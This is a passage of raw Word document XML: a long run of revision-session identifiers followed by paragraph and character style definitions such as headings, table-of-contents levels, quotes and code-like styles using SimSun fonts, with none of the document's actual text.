    <w:rsid w:val="007619F2"/>
    <w:rsid w:val="0076259E"/>
    <w:rsid w:val="00766C5B"/>
    <w:rsid w:val="0076737E"/>
    <w:rsid w:val="007674F2"/>
    <w:rsid w:val="00767980"/>
    <w:rsid w:val="00773B1B"/>
    <w:rsid w:val="00775D8D"/>
    <w:rsid w:val="00777FD0"/>
    <w:rsid w:val="00782BFF"/>
    <w:rsid w:val="00784936"/>
    <w:rsid w:val="00787949"/>
    <w:rsid w:val="007A0DDD"/>
    <w:rsid w:val="007A498D"/>
    <w:rsid w:val="007B52FD"/>
    <w:rsid w:val="007B5C81"/>
    <w:rsid w:val="007C736F"/>
    <w:rsid w:val="007D2F19"/>
    <w:rsid w:val="007D396C"/>
    <w:rsid w:val="007E6EE9"/>
    <w:rsid w:val="007F058E"/>
    <w:rsid w:val="007F2704"/>
    <w:rsid w:val="007F3BC9"/>
    <w:rsid w:val="008004F4"/>
    <w:rsid w:val="00800989"/>
    <w:rsid w:val="008029A0"/>
    <w:rsid w:val="00804197"/>
    <w:rsid w:val="00805F86"/>
    <w:rsid w:val="0080722A"/>
    <w:rsid w:val="00810CCE"/>
    <w:rsid w:val="00811EB7"/>
    <w:rsid w:val="00827B0A"/>
    <w:rsid w:val="00831706"/>
    <w:rsid w:val="008322F8"/>
    <w:rsid w:val="0083567A"/>
    <w:rsid w:val="0083680A"/>
    <w:rsid w:val="00842BA1"/>
    <w:rsid w:val="008446B5"/>
    <w:rsid w:val="00846C79"/>
    <w:rsid w:val="00850B80"/>
    <w:rsid w:val="00853680"/>
    <w:rsid w:val="00854D75"/>
    <w:rsid w:val="0086327C"/>
    <w:rsid w:val="00870FBA"/>
    <w:rsid w:val="00882CA5"/>
    <w:rsid w:val="008848B1"/>
    <w:rsid w:val="00885882"/>
    <w:rsid w:val="00886506"/>
    <w:rsid w:val="00887A5F"/>
    <w:rsid w:val="008910BC"/>
    <w:rsid w:val="008911E1"/>
    <w:rsid w:val="00892A93"/>
    <w:rsid w:val="00894AC5"/>
    <w:rsid w:val="00895E15"/>
    <w:rsid w:val="00897394"/>
    <w:rsid w:val="008A148A"/>
    <w:rsid w:val="008A1991"/>
    <w:rsid w:val="008A3F20"/>
    <w:rsid w:val="008A4699"/>
    <w:rsid w:val="008A6EA0"/>
    <w:rsid w:val="008B1FEC"/>
    <w:rsid w:val="008B2D41"/>
    <w:rsid w:val="008C712A"/>
    <w:rsid w:val="008D45E0"/>
    <w:rsid w:val="008E1E95"/>
    <w:rsid w:val="008E2F41"/>
    <w:rsid w:val="008E6547"/>
    <w:rsid w:val="008F0F25"/>
    <w:rsid w:val="008F1F18"/>
    <w:rsid w:val="008F25B6"/>
    <w:rsid w:val="008F3137"/>
    <w:rsid w:val="008F32A4"/>
    <w:rsid w:val="008F698C"/>
    <w:rsid w:val="00904EAC"/>
    <w:rsid w:val="00905DC8"/>
    <w:rsid w:val="009148FA"/>
    <w:rsid w:val="00914FD7"/>
    <w:rsid w:val="00916E6C"/>
    <w:rsid w:val="00922383"/>
    <w:rsid w:val="0092285C"/>
    <w:rsid w:val="00925D66"/>
    <w:rsid w:val="00934AD9"/>
    <w:rsid w:val="00935551"/>
    <w:rsid w:val="0093586F"/>
    <w:rsid w:val="0094173F"/>
    <w:rsid w:val="0094256D"/>
    <w:rsid w:val="00951C93"/>
    <w:rsid w:val="00955822"/>
    <w:rsid w:val="009605F4"/>
    <w:rsid w:val="009718E0"/>
    <w:rsid w:val="00973F3E"/>
    <w:rsid w:val="00981AC6"/>
    <w:rsid w:val="00981EAC"/>
    <w:rsid w:val="00983A50"/>
    <w:rsid w:val="0099168C"/>
    <w:rsid w:val="00993CB5"/>
    <w:rsid w:val="00995B76"/>
    <w:rsid w:val="009A4E08"/>
    <w:rsid w:val="009A5D99"/>
    <w:rsid w:val="009A6D28"/>
    <w:rsid w:val="009B2196"/>
    <w:rsid w:val="009B561A"/>
    <w:rsid w:val="009C04D9"/>
    <w:rsid w:val="009C2FDC"/>
    <w:rsid w:val="009D0103"/>
    <w:rsid w:val="009D35D6"/>
    <w:rsid w:val="009D6CBC"/>
    <w:rsid w:val="009E06EC"/>
    <w:rsid w:val="009E143B"/>
    <w:rsid w:val="009E4967"/>
    <w:rsid w:val="009F0DDB"/>
    <w:rsid w:val="009F2EC1"/>
    <w:rsid w:val="009F6926"/>
    <w:rsid w:val="00A02543"/>
    <w:rsid w:val="00A044B4"/>
    <w:rsid w:val="00A04C68"/>
    <w:rsid w:val="00A06688"/>
    <w:rsid w:val="00A07749"/>
    <w:rsid w:val="00A1069A"/>
    <w:rsid w:val="00A134EC"/>
    <w:rsid w:val="00A172B5"/>
    <w:rsid w:val="00A17E1A"/>
    <w:rsid w:val="00A20D27"/>
    <w:rsid w:val="00A27E5A"/>
    <w:rsid w:val="00A30714"/>
    <w:rsid w:val="00A30733"/>
    <w:rsid w:val="00A329F1"/>
    <w:rsid w:val="00A36082"/>
    <w:rsid w:val="00A42A32"/>
    <w:rsid w:val="00A43021"/>
    <w:rsid w:val="00A45196"/>
    <w:rsid w:val="00A464F1"/>
    <w:rsid w:val="00A575A4"/>
    <w:rsid w:val="00A619C0"/>
    <w:rsid w:val="00A65AE7"/>
    <w:rsid w:val="00A6762B"/>
    <w:rsid w:val="00A70A30"/>
    <w:rsid w:val="00A70EE9"/>
    <w:rsid w:val="00A72966"/>
    <w:rsid w:val="00A73BBA"/>
    <w:rsid w:val="00A75262"/>
    <w:rsid w:val="00A80A03"/>
    <w:rsid w:val="00A80D58"/>
    <w:rsid w:val="00A825FA"/>
    <w:rsid w:val="00A857C0"/>
    <w:rsid w:val="00A9161A"/>
    <w:rsid w:val="00AA2457"/>
    <w:rsid w:val="00AA3893"/>
    <w:rsid w:val="00AA4C70"/>
    <w:rsid w:val="00AA6190"/>
    <w:rsid w:val="00AB0F23"/>
    <w:rsid w:val="00AB1F16"/>
    <w:rsid w:val="00AB73A0"/>
    <w:rsid w:val="00AC2303"/>
    <w:rsid w:val="00AC6A3D"/>
    <w:rsid w:val="00AD5F0B"/>
    <w:rsid w:val="00AD7004"/>
    <w:rsid w:val="00AD72D9"/>
    <w:rsid w:val="00AE078F"/>
    <w:rsid w:val="00AF0FCD"/>
    <w:rsid w:val="00AF1B8C"/>
    <w:rsid w:val="00AF5219"/>
    <w:rsid w:val="00B0420E"/>
    <w:rsid w:val="00B104E2"/>
    <w:rsid w:val="00B133E7"/>
    <w:rsid w:val="00B1522D"/>
    <w:rsid w:val="00B172D4"/>
    <w:rsid w:val="00B209CA"/>
    <w:rsid w:val="00B216C3"/>
    <w:rsid w:val="00B25045"/>
    <w:rsid w:val="00B335FA"/>
    <w:rsid w:val="00B40F2B"/>
    <w:rsid w:val="00B54278"/>
    <w:rsid w:val="00B568BE"/>
    <w:rsid w:val="00B65EF6"/>
    <w:rsid w:val="00B72483"/>
    <w:rsid w:val="00B74AF3"/>
    <w:rsid w:val="00B74C2D"/>
    <w:rsid w:val="00B74CA7"/>
    <w:rsid w:val="00B752FB"/>
    <w:rsid w:val="00B823FC"/>
    <w:rsid w:val="00B848E1"/>
    <w:rsid w:val="00B90470"/>
    <w:rsid w:val="00B90B8A"/>
    <w:rsid w:val="00B913BA"/>
    <w:rsid w:val="00B923E8"/>
    <w:rsid w:val="00B93134"/>
    <w:rsid w:val="00B9560B"/>
    <w:rsid w:val="00B9695E"/>
    <w:rsid w:val="00BA026A"/>
    <w:rsid w:val="00BA1068"/>
    <w:rsid w:val="00BA10F1"/>
    <w:rsid w:val="00BA5282"/>
    <w:rsid w:val="00BA71B3"/>
    <w:rsid w:val="00BB4967"/>
    <w:rsid w:val="00BB6F65"/>
    <w:rsid w:val="00BC4C33"/>
    <w:rsid w:val="00BC6D1F"/>
    <w:rsid w:val="00BD13D5"/>
    <w:rsid w:val="00BD1599"/>
    <w:rsid w:val="00BD3E41"/>
    <w:rsid w:val="00BD6FE5"/>
    <w:rsid w:val="00BE1A31"/>
    <w:rsid w:val="00BE45E0"/>
    <w:rsid w:val="00BE716B"/>
    <w:rsid w:val="00BF3A32"/>
    <w:rsid w:val="00BF3BF6"/>
    <w:rsid w:val="00BF5E9B"/>
    <w:rsid w:val="00C04504"/>
    <w:rsid w:val="00C0581A"/>
    <w:rsid w:val="00C0667B"/>
    <w:rsid w:val="00C10981"/>
    <w:rsid w:val="00C1313A"/>
    <w:rsid w:val="00C133AD"/>
    <w:rsid w:val="00C15234"/>
    <w:rsid w:val="00C226C7"/>
    <w:rsid w:val="00C23B07"/>
    <w:rsid w:val="00C24725"/>
    <w:rsid w:val="00C26EB2"/>
    <w:rsid w:val="00C30BAD"/>
    <w:rsid w:val="00C368D8"/>
    <w:rsid w:val="00C425CD"/>
    <w:rsid w:val="00C42855"/>
    <w:rsid w:val="00C435EF"/>
    <w:rsid w:val="00C446EC"/>
    <w:rsid w:val="00C44CDE"/>
    <w:rsid w:val="00C46FEA"/>
    <w:rsid w:val="00C5329C"/>
    <w:rsid w:val="00C562D3"/>
    <w:rsid w:val="00C60679"/>
    <w:rsid w:val="00C62978"/>
    <w:rsid w:val="00C679E3"/>
    <w:rsid w:val="00C71DE6"/>
    <w:rsid w:val="00C77328"/>
    <w:rsid w:val="00C9194F"/>
    <w:rsid w:val="00CA005E"/>
    <w:rsid w:val="00CA2EFA"/>
    <w:rsid w:val="00CA5318"/>
    <w:rsid w:val="00CA67ED"/>
    <w:rsid w:val="00CA74C4"/>
    <w:rsid w:val="00CB40FA"/>
    <w:rsid w:val="00CC0D8D"/>
    <w:rsid w:val="00CC13E1"/>
    <w:rsid w:val="00CC5D54"/>
    <w:rsid w:val="00CD21E9"/>
    <w:rsid w:val="00CD4121"/>
    <w:rsid w:val="00CE22CB"/>
    <w:rsid w:val="00CF0C16"/>
    <w:rsid w:val="00CF63B0"/>
    <w:rsid w:val="00D02325"/>
    <w:rsid w:val="00D060FE"/>
    <w:rsid w:val="00D10DC4"/>
    <w:rsid w:val="00D1197D"/>
    <w:rsid w:val="00D1581D"/>
    <w:rsid w:val="00D24B08"/>
    <w:rsid w:val="00D27A24"/>
    <w:rsid w:val="00D313F6"/>
    <w:rsid w:val="00D4008B"/>
    <w:rsid w:val="00D415C2"/>
    <w:rsid w:val="00D50FA1"/>
    <w:rsid w:val="00D51C92"/>
    <w:rsid w:val="00D54196"/>
    <w:rsid w:val="00D55DE4"/>
    <w:rsid w:val="00D63AE6"/>
    <w:rsid w:val="00D6693E"/>
    <w:rsid w:val="00D7690E"/>
    <w:rsid w:val="00D77201"/>
    <w:rsid w:val="00D773A0"/>
    <w:rsid w:val="00D90285"/>
    <w:rsid w:val="00D90486"/>
    <w:rsid w:val="00D917D5"/>
    <w:rsid w:val="00D93C14"/>
    <w:rsid w:val="00D94C02"/>
    <w:rsid w:val="00D96A15"/>
    <w:rsid w:val="00DA050B"/>
    <w:rsid w:val="00DA09FD"/>
    <w:rsid w:val="00DA14FA"/>
    <w:rsid w:val="00DA6FFC"/>
    <w:rsid w:val="00DC4447"/>
    <w:rsid w:val="00DD2040"/>
    <w:rsid w:val="00DD287C"/>
    <w:rsid w:val="00DD2986"/>
    <w:rsid w:val="00DD655B"/>
    <w:rsid w:val="00DE2CC5"/>
    <w:rsid w:val="00DE3922"/>
    <w:rsid w:val="00DE4A02"/>
    <w:rsid w:val="00DE76FF"/>
    <w:rsid w:val="00DF0299"/>
    <w:rsid w:val="00DF0799"/>
    <w:rsid w:val="00DF20A6"/>
    <w:rsid w:val="00DF4F29"/>
    <w:rsid w:val="00DF5A93"/>
    <w:rsid w:val="00DF650A"/>
    <w:rsid w:val="00E0310D"/>
    <w:rsid w:val="00E05684"/>
    <w:rsid w:val="00E07498"/>
    <w:rsid w:val="00E1244A"/>
    <w:rsid w:val="00E2180F"/>
    <w:rsid w:val="00E225CE"/>
    <w:rsid w:val="00E22ECB"/>
    <w:rsid w:val="00E27F14"/>
    <w:rsid w:val="00E4545D"/>
    <w:rsid w:val="00E638D8"/>
    <w:rsid w:val="00E67AE6"/>
    <w:rsid w:val="00E70373"/>
    <w:rsid w:val="00E71757"/>
    <w:rsid w:val="00E73D5D"/>
    <w:rsid w:val="00E80426"/>
    <w:rsid w:val="00E81901"/>
    <w:rsid w:val="00E86689"/>
    <w:rsid w:val="00E96F04"/>
    <w:rsid w:val="00EA1CD2"/>
    <w:rsid w:val="00EB01A5"/>
    <w:rsid w:val="00EB7257"/>
    <w:rsid w:val="00EC4569"/>
    <w:rsid w:val="00ED35B9"/>
    <w:rsid w:val="00ED4A5C"/>
    <w:rsid w:val="00ED7EE9"/>
    <w:rsid w:val="00EE17AE"/>
    <w:rsid w:val="00EE2828"/>
    <w:rsid w:val="00EE433A"/>
    <w:rsid w:val="00EE47C5"/>
    <w:rsid w:val="00EE53DA"/>
    <w:rsid w:val="00EE649E"/>
    <w:rsid w:val="00EE75C9"/>
    <w:rsid w:val="00EF556A"/>
    <w:rsid w:val="00EF5B46"/>
    <w:rsid w:val="00F017A2"/>
    <w:rsid w:val="00F0592A"/>
    <w:rsid w:val="00F06AC5"/>
    <w:rsid w:val="00F06EDB"/>
    <w:rsid w:val="00F07003"/>
    <w:rsid w:val="00F12705"/>
    <w:rsid w:val="00F13B62"/>
    <w:rsid w:val="00F17046"/>
    <w:rsid w:val="00F23DCB"/>
    <w:rsid w:val="00F2501D"/>
    <w:rsid w:val="00F25B90"/>
    <w:rsid w:val="00F2723E"/>
    <w:rsid w:val="00F27306"/>
    <w:rsid w:val="00F31972"/>
    <w:rsid w:val="00F3646E"/>
    <w:rsid w:val="00F36BA7"/>
    <w:rsid w:val="00F36ED4"/>
    <w:rsid w:val="00F40BE9"/>
    <w:rsid w:val="00F41154"/>
    <w:rsid w:val="00F416BD"/>
    <w:rsid w:val="00F5028B"/>
    <w:rsid w:val="00F524D4"/>
    <w:rsid w:val="00F56FDB"/>
    <w:rsid w:val="00F61865"/>
    <w:rsid w:val="00F64136"/>
    <w:rsid w:val="00F73878"/>
    <w:rsid w:val="00F773A4"/>
    <w:rsid w:val="00F800AC"/>
    <w:rsid w:val="00F805E5"/>
    <w:rsid w:val="00F81EEC"/>
    <w:rsid w:val="00F85D30"/>
    <w:rsid w:val="00F93882"/>
    <w:rsid w:val="00F94E51"/>
    <w:rsid w:val="00FA2766"/>
    <w:rsid w:val="00FA2C7C"/>
    <w:rsid w:val="00FA5289"/>
    <w:rsid w:val="00FB0650"/>
    <w:rsid w:val="00FB25CA"/>
    <w:rsid w:val="00FB76FF"/>
    <w:rsid w:val="00FC3D4B"/>
    <w:rsid w:val="00FC6E02"/>
    <w:rsid w:val="00FD01D6"/>
    <w:rsid w:val="00FD13BB"/>
    <w:rsid w:val="00FD44FC"/>
    <w:rsid w:val="00FD5EF9"/>
    <w:rsid w:val="00FE0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C17C"/>
  <w15:docId w15:val="{F58FA3D2-E887-4F83-A9CE-7C8C66FE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7D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008C7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1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1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71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71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1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1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71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1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1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1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71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71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71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1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1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C712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E53DA"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008C712A"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008C712A"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D27A24"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D27A24"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D27A24"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D27A24"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D27A24"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008C71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7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1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71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1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712A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="008C712A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="008C712A"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="008C712A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="008C712A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="008C7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712A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="008C712A"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="808080" w:themeColor="text1" w:themeTint="7F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="008C712A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="008C712A"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="C0504D" w:themeColor="accent2"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="008C712A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="C0504D" w:themeColor="accent2"/>
      <w:spacing w:val="5"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="008C712A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="notranslate">
    <w:name w:val="notranslate"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BC4C33"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00BC4C33"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A04C68"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A04C68"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="contenttext">
    <w:name w:val="content_text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A04C68"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="terminal">
    <w:name w:val="terminal"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009F6926"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="key">
    <w:name w:val="key"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="009F6926"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0077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777FD0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D6693E"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="002432E8"/>
    <w:pPr>
      <w:widowControl w:val="0"/>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093FEF"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="line2">
    <w:name w:val="line2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0094256D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="comment2">
    <w:name w:val="comment2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006A53ED"/>
    <w:rPr>
      <w:color w:val="8E908C"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword3">
    <w:name w:val="keyword3"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006A53ED"/>
    <w:rPr>
      <w:color w:val="8959A8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="number2">
    <w:name w:val="number2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006A53ED"/>
    <w:rPr>
      <w:color w:val="F5871F"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="smalltext">
    <w:name w:val="smalltext"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B72483"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p2">
    <w:name w:val="p2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B923E8"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B923E8"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p5">
    <w:name w:val="p5"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B923E8"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B923E8"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p7">
    <w:name w:val="p7"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00B923E8"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
